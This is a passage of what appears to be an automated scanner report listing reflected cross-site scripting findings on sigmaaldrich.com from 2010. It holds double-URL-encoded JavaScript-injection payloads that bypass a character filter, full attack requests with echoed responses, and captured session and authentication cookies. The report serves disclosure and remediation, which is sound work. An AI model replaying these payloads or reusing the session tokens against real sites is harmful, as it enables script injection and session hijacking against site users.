Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:50 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatographyabd50";alert(1)//8a5dab69c77/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.81. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51566%2522%253balert%25281%2529%252f%252facbc8230b3 was submitted in the REST URL parameter 5. This input was echoed as 51566";alert(1)//acbc8230b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog51566%2522%253balert%25281%2529%252f%252facbc8230b3 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 29002
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog51566";alert(1)//acbc8230b3","E404") ;
   </script>
...[SNIP]...

1.82. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e6a2%2522%253balert%25281%2529%252f%252fa640488014b was submitted in the REST URL parameter 1. This input was echoed as 1e6a2";alert(1)//a640488014b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1e6a2%2522%253balert%25281%2529%252f%252fa640488014b/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1e6a2";alert(1)//a640488014b/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.83. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9b8%2522%253balert%25281%2529%252f%252ff71090fe4b5 was submitted in the REST URL parameter 2. This input was echoed as 1c9b8";alert(1)//f71090fe4b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1c9b8%2522%253balert%25281%2529%252f%252ff71090fe4b5/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1c9b8";alert(1)//f71090fe4b5/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.84. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b90ad%2522%253balert%25281%2529%252f%252f854402a9ab3 was submitted in the REST URL parameter 3. This input was echoed as b90ad";alert(1)//854402a9ab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestb90ad%2522%253balert%25281%2529%252f%252f854402a9ab3/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestb90ad";alert(1)//854402a9ab3/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.85. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c27%2522%253balert%25281%2529%252f%252f7975ddc7b5f was submitted in the REST URL parameter 4. This input was echoed as 36c27";alert(1)//7975ddc7b5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography36c27%2522%253balert%25281%2529%252f%252f7975ddc7b5f/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
